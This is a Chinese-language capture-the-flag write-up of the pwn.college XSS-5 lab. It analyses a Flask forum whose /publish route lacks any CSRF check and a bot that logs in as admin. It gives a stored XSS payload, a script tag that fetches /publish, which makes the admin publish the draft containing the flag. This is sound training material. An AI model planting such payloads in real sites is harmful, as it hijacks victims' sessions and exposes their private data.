XSS-5

题目简介

/challenge目录下有两个程序,server脚本开启网络服务,该服务模拟一个论坛功能,存在登录、发布帖子以及存草稿等功能,victim脚本模拟受害者,会去访问论坛网页,如果XSS注入成功,就能得到flag

漏洞点分析

先看server端源代码:

1
2
3
4
5
6
7
8
9
10
db.execute("""CREATE TABLE posts AS SELECT ? AS content, "admin" AS author, FALSE AS published""", [flag])
db.execute("""CREATE TABLE posts AS SELECT ? AS content, "admin" AS author, FALSE AS published""", [flag])
@app.route("/publish", methods=["GET"])
def challenge_publish():
    if "username" not in flask.session:
        flask.abort(403, "Log in first!")

    # https://www.sqlite.org/lang_update.html
    db.execute("UPDATE posts SET published = TRUE WHERE author = ?", [flask.session.get("username")])
    return flask.redirect("/")

通过分析上述代码块,发现admin用户名下的帖子正是需要的flag,但初始是草稿状态,只能显示开头12个字符,因此需要想办法让admin把自己的贴子发布出去

同时注意到如果对应的用户访问了/publish路由,就会直接将自己名下的草稿全部发出去,没有二次校验,因此想办法让admin访问注入后的页面,正好观察victim代码:

1
2
3
4
5
6
7
8
challenge_url = "http://challenge.localhost:80/"

print(f"Visiting {challenge_url}")
browser.get(challenge_url)

browser.find_element(By.NAME, "username").send_keys("admin")
browser.find_element(By.NAME, "password").send_keys(open("/flag").read().strip())
browser.find_element(By.NAME, "submit").submit()

可以发现该脚本正是需要的模拟admin登录,因此可以尝试注入js脚本达到欺骗admin把帖子发出去的目的

利用方法

由于guest用户的口令是已知的,可以先以guest身份登录,发布包含恶意Javascript代码的帖子,如下:

1
<script>fetch("http://challenge.localhost/publish")</script>

之后再运行victim脚本,最后刷新网页,可以观察到flag泄露

pwn.college题解 > intro > Web
XSS-5
http://0x4a-210.github.io/2025/07/15/pwn.college/Intro-to-Cybersecurity/Web/XSS-5/
Posted on
July 15, 2025
Licensed under